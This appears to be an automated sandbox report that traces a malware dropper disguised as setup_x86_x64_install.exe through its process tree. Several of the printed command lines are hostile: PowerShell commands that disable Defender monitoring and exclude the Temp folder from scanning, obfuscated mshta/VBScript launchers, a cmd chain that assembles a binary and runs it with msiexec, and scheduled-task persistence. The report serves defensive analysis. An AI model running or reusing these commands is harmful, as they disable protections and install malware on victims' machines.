PID 3120 wrote to memory of 2040 | 3120 | setup_install.exe | cmd.exe (×3)
PID 3120 wrote to memory of 1824 | 3120 | setup_install.exe | cmd.exe (×3)
PID 3120 wrote to memory of 1304 | 3120 | setup_install.exe | cmd.exe (×3)
PID 3120 wrote to memory of 3892 | 3120 | setup_install.exe | cmd.exe (×3)
PID 3120 wrote to memory of 2420 | 3120 | setup_install.exe | cmd.exe (×3)
PID 3168 wrote to memory of 3848 | 3168 | cmd.exe | Sat14f1396dfcf191bd.exe (×2)
PID 2040 wrote to memory of 1108 | 2040 | cmd.exe | Sat14d32a38896785b13.exe (×2)
PID 3120 wrote to memory of 3632 | 3120 | setup_install.exe | cmd.exe (×3)
PID 3120 wrote to memory of 3524 | 3120 | setup_install.exe | cmd.exe (×3)
PID 3120 wrote to memory of 1020 | 3120 | setup_install.exe | cmd.exe (×3)
PID 1824 wrote to memory of 4044 | 1824 | cmd.exe | Sat14febbc433.exe (×3)
PID 3120 wrote to memory of 3100 | 3120 | setup_install.exe | cmd.exe (×3)
PID 3216 wrote to memory of 512 | 3216 | cmd.exe | Sat14514904a4b.exe (×2)
PID 420 wrote to memory of 3624 | 420 | cmd.exe | Sat142b09ae40c44cf.exe
outlook_office_path 1 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | Settings.exe
outlook_win_path 1 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | Settings.exe
Processes (each entry: [tree depth] image path | command line; indentation follows the process tree, behaviours are listed as "-" items under the process)
[1] c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
[1] c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k netsvcs -s Schedule
    - Drops file in System32 directory
    - Drops file in Windows directory
  [2] C:\Users\Admin\AppData\Roaming\trfbdig | C:\Users\Admin\AppData\Roaming\trfbdig
      - Checks SCSI registry key(s)
      - Suspicious behavior: MapViewOfSection
  [2] C:\Users\Admin\AppData\Roaming\dcfbdig | C:\Users\Admin\AppData\Roaming\dcfbdig
      - Suspicious use of NtCreateProcessExOtherParentProcess
      - Checks SCSI registry key(s)
      - Suspicious behavior: MapViewOfSection
  [2] C:\Users\Admin\AppData\Roaming\fgfbdig | C:\Users\Admin\AppData\Roaming\fgfbdig
      - Suspicious use of SetThreadContext
    [3] C:\Users\Admin\AppData\Roaming\fgfbdig | C:\Users\Admin\AppData\Roaming\fgfbdig
  [2] C:\Users\Admin\AppData\Roaming\safbdig | C:\Users\Admin\AppData\Roaming\safbdig
    [3] C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 6372 -s 476
        - Suspicious use of NtCreateProcessExOtherParentProcess
        - Program crash
  [2] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    [3] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
      [4] C:\Windows\SysWOW64\schtasks.exe | /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
          - Creates scheduled task(s)
  [2] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
      - Suspicious use of SetThreadContext
    [3] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  [2] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
      - Suspicious use of SetThreadContext
    [3] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  [2] C:\Users\Admin\AppData\Roaming\trfbdig | C:\Users\Admin\AppData\Roaming\trfbdig
      - Suspicious behavior: MapViewOfSection
  [2] C:\Users\Admin\AppData\Roaming\fgfbdig | C:\Users\Admin\AppData\Roaming\fgfbdig
      - Suspicious use of SetThreadContext
    [3] C:\Users\Admin\AppData\Roaming\fgfbdig | C:\Users\Admin\AppData\Roaming\fgfbdig
  [2] C:\Users\Admin\AppData\Roaming\dcfbdig | C:\Users\Admin\AppData\Roaming\dcfbdig
      - Checks SCSI registry key(s)
      - Suspicious behavior: MapViewOfSection
  [2] C:\Users\Admin\AppData\Local\e016a640-be85-42ec-91ac-8bb6fe5ea86a\E757.exe | C:\Users\Admin\AppData\Local\e016a640-be85-42ec-91ac-8bb6fe5ea86a\E757.exe --Task
      - Suspicious use of SetThreadContext
    [3] C:\Users\Admin\AppData\Local\e016a640-be85-42ec-91ac-8bb6fe5ea86a\E757.exe | C:\Users\Admin\AppData\Local\e016a640-be85-42ec-91ac-8bb6fe5ea86a\E757.exe --Task
        - Checks computer location settings
  [2] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
      - Suspicious use of SetThreadContext
    [3] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  [2] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
      - Suspicious use of SetThreadContext
    [3] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  [2] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
      - Suspicious use of SetThreadContext
    [3] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  [2] C:\Users\Admin\AppData\Local\e016a640-be85-42ec-91ac-8bb6fe5ea86a\E757.exe | C:\Users\Admin\AppData\Local\e016a640-be85-42ec-91ac-8bb6fe5ea86a\E757.exe --Task
      - Suspicious use of SetThreadContext
    [3] C:\Users\Admin\AppData\Local\e016a640-be85-42ec-91ac-8bb6fe5ea86a\E757.exe | C:\Users\Admin\AppData\Local\e016a640-be85-42ec-91ac-8bb6fe5ea86a\E757.exe --Task
  [2] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
      - Suspicious use of SetThreadContext
    [3] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  [2] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
      - Suspicious use of SetThreadContext
    [3] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  [2] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
      - Suspicious use of SetThreadContext
    [3] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  [2] C:\Users\Admin\AppData\Roaming\trfbdig | C:\Users\Admin\AppData\Roaming\trfbdig
      - Checks SCSI registry key(s)
  [2] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
      - Suspicious use of SetThreadContext
    [3] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  [2] C:\Users\Admin\AppData\Roaming\fgfbdig | C:\Users\Admin\AppData\Roaming\fgfbdig
      - Suspicious use of SetThreadContext
    [3] C:\Users\Admin\AppData\Roaming\fgfbdig | C:\Users\Admin\AppData\Roaming\fgfbdig
  [2] C:\Users\Admin\AppData\Roaming\dcfbdig | C:\Users\Admin\AppData\Roaming\dcfbdig
  [2] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
      - Suspicious use of SetThreadContext
    [3] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  [2] C:\Users\Admin\AppData\Local\e016a640-be85-42ec-91ac-8bb6fe5ea86a\E757.exe | C:\Users\Admin\AppData\Local\e016a640-be85-42ec-91ac-8bb6fe5ea86a\E757.exe --Task
      - Suspicious use of SetThreadContext
    [3] C:\Users\Admin\AppData\Local\e016a640-be85-42ec-91ac-8bb6fe5ea86a\E757.exe | C:\Users\Admin\AppData\Local\e016a640-be85-42ec-91ac-8bb6fe5ea86a\E757.exe --Task
  [2] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
      - Suspicious use of SetThreadContext
    [3] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  [2] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
      - Suspicious use of SetThreadContext
    [3] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  [2] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
      - Suspicious use of SetThreadContext
    [3] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  [2] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
      - Suspicious use of SetThreadContext
    [3] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  [2] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
      - Suspicious use of SetThreadContext
    [3] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  [2] C:\Users\Admin\AppData\Local\e016a640-be85-42ec-91ac-8bb6fe5ea86a\E757.exe | C:\Users\Admin\AppData\Local\e016a640-be85-42ec-91ac-8bb6fe5ea86a\E757.exe --Task
      - Suspicious use of SetThreadContext
    [3] C:\Users\Admin\AppData\Local\e016a640-be85-42ec-91ac-8bb6fe5ea86a\E757.exe | C:\Users\Admin\AppData\Local\e016a640-be85-42ec-91ac-8bb6fe5ea86a\E757.exe --Task
  [2] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
      - Suspicious use of SetThreadContext
    [3] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  [2] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
      - Suspicious use of SetThreadContext
    [3] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  [2] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
      - Suspicious use of SetThreadContext
    [3] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  [2] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
      - Suspicious use of SetThreadContext
    [3] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  [2] C:\Users\Admin\AppData\Roaming\fgfbdig | C:\Users\Admin\AppData\Roaming\fgfbdig
      - Suspicious use of SetThreadContext
    [3] C:\Users\Admin\AppData\Roaming\fgfbdig | C:\Users\Admin\AppData\Roaming\fgfbdig
  [2] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
      - Suspicious use of SetThreadContext
    [3] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  [2] C:\Users\Admin\AppData\Local\e016a640-be85-42ec-91ac-8bb6fe5ea86a\E757.exe | C:\Users\Admin\AppData\Local\e016a640-be85-42ec-91ac-8bb6fe5ea86a\E757.exe --Task
      - Suspicious use of SetThreadContext
    [3] C:\Users\Admin\AppData\Local\e016a640-be85-42ec-91ac-8bb6fe5ea86a\E757.exe | C:\Users\Admin\AppData\Local\e016a640-be85-42ec-91ac-8bb6fe5ea86a\E757.exe --Task
  [2] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
      - Suspicious use of SetThreadContext
    [3] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  [2] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
      - Suspicious use of SetThreadContext
    [3] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  [2] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
      - Suspicious use of SetThreadContext
    [3] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  [2] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
      - Suspicious use of SetThreadContext
    [3] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  [2] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
      - Suspicious use of SetThreadContext
    [3] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe | C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
[1] c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
[1] c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k netsvcs -s Browser
    - Suspicious use of SetThreadContext
  [2] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k SystemNetworkService
      - Drops file in System32 directory
      - Checks processor information in registry
      - Modifies data under HKEY_USERS
      - Modifies registry class
[1] c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k netsvcs -s WpnService
[1] c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
[1] c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
[1] c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
    - Enumerates connected drives
[1] c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k netsvcs -s SENS
[1] c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k netsvcs -s UserManager
[1] c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k netsvcs -s Themes
[1] c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
[1] C:\Users\Admin\AppData\Local\Temp\ha.exe | "C:\Users\Admin\AppData\Local\Temp\ha.exe"
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
[1] C:\Users\Admin\Desktop\CrowdInspect64.exe | "C:\Users\Admin\Desktop\CrowdInspect64.exe"
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
[1] C:\Windows\system32\NOTEPAD.EXE | "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Новый текстовый документ.txt
[1] C:\Users\Admin\Desktop\setup_x86_x64_install.exe | "C:\Users\Admin\Desktop\setup_x86_x64_install.exe"
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      - Executes dropped EXE
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory
    [3] C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\setup_install.exe | "C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\setup_install.exe"
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of SetWindowsHookEx
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
      [4] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      [4] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c Sat14f1396dfcf191bd.exe
          - Suspicious use of WriteProcessMemory
        [5] C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat14f1396dfcf191bd.exe | Sat14f1396dfcf191bd.exe
            - Executes dropped EXE
          [6] C:\Users\Admin\AppData\Roaming\5025751.exe | "C:\Users\Admin\AppData\Roaming\5025751.exe"
              - Executes dropped EXE
          [6] C:\Users\Admin\AppData\Roaming\7536159.exe | "C:\Users\Admin\AppData\Roaming\7536159.exe"
              - Executes dropped EXE
            [7] C:\Users\Admin\AppData\Roaming\7536159.exe | "C:\Users\Admin\AppData\Roaming\7536159.exe"
                - Suspicious use of SetWindowsHookEx
          [6] C:\Users\Admin\AppData\Roaming\7477494.exe | "C:\Users\Admin\AppData\Roaming\7477494.exe"
              - Executes dropped EXE
          [6] C:\Users\Admin\AppData\Roaming\3340470.exe | "C:\Users\Admin\AppData\Roaming\3340470.exe"
              - Executes dropped EXE
              - Adds Run key to start application
            [7] C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe | "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                - Executes dropped EXE
          [6] C:\Users\Admin\AppData\Roaming\7977000.exe | "C:\Users\Admin\AppData\Roaming\7977000.exe"
              - Executes dropped EXE
      [4] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c Sat142b09ae40c44cf.exe
          - Suspicious use of WriteProcessMemory
        [5] C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat142b09ae40c44cf.exe | Sat142b09ae40c44cf.exe
            - Executes dropped EXE
            - Suspicious use of SetWindowsHookEx
          [6] C:\Windows\SysWOW64\mshta.exe | "C:\Windows\System32\mshta.exe" vbsCRIPT: cLOsE (CreaTEobject ( "wscRiPT.sHELl" ). rUN ( "cmD.EXE /C TYPe ""C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat142b09ae40c44cf.exe"" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If """" == """" for %f iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat142b09ae40c44cf.exe"" ) do taskkill -iM ""%~NXf"" /f " , 0 , tRUe) )
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C TYPe "C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat142b09ae40c44cf.exe" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If "" == "" for %f iN ( "C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat142b09ae40c44cf.exe" ) do taskkill -iM "%~NXf" /f7⤵
-
C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXEJyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCRIPT: cLOsE (CreaTEobject ( "wscRiPT.sHELl" ). rUN ( "cmD.EXE /C TYPe ""C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE"" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If ""/p~P_UpSUZjMkOKsY "" == """" for %f iN ( ""C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE"" ) do taskkill -iM ""%~NXf"" /f " , 0 , tRUe) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C TYPe "C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If "/p~P_UpSUZjMkOKsY " == "" for %f iN ( "C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE" ) do taskkill -iM "%~NXf" /f10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCriPT: CLOSe (CReAteoBject ( "wSCRiPt.SHeLL" ). Run( "CmD.exE /Q /R EcHO Soy%TimE%jk> 1hsQZ.62D &ecHO | sEt /P = ""MZ"" >PajLCM.4 & CoPy /Y /b PAjlCM.4 + lKYqBUE.m + VUR_hcMP.3T + U9bIUq0J.~DW + I5glXU.Q+ 9h1gI_nY.T + 1HSQZ.62D 2KSA.Gf7 & STaRT msiexec -y .\2KSA.GF7 " , 0 , truE) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /R EcHO Soy%TimE%jk>1hsQZ.62D &ecHO | sEt /P = "MZ" >PajLCM.4& CoPy /Y /b PAjlCM.4 +lKYqBUE.m + VUR_hcMP.3T + U9bIUq0J.~DW + I5glXU.Q+9h1gI_nY.T + 1HSQZ.62D 2KSA.Gf7 & STaRT msiexec -y .\2KSA.GF710⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ecHO "11⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>PajLCM.4"11⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -y .\2KSA.GF711⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -iM "Sat142b09ae40c44cf.exe" /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat14d32a38896785b13.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat14d32a38896785b13.exeSat14d32a38896785b13.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"7⤵
- Executes dropped EXE
-
C:\ProgramData\1104282.exe"C:\ProgramData\1104282.exe"8⤵
- Suspicious behavior: SetClipboardViewer
-
C:\ProgramData\7432933.exe"C:\ProgramData\7432933.exe"8⤵
- Suspicious use of SetThreadContext
-
C:\ProgramData\7432933.exe"C:\ProgramData\7432933.exe"9⤵
-
C:\ProgramData\7432933.exe"C:\ProgramData\7432933.exe"9⤵
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\7403546.exe"C:\ProgramData\7403546.exe"8⤵
-
C:\ProgramData\7063847.exe"C:\ProgramData\7063847.exe"8⤵
- Suspicious use of SetThreadContext
-
C:\ProgramData\7063847.exe"C:\ProgramData\7063847.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"9⤵
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi10⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"12⤵
-
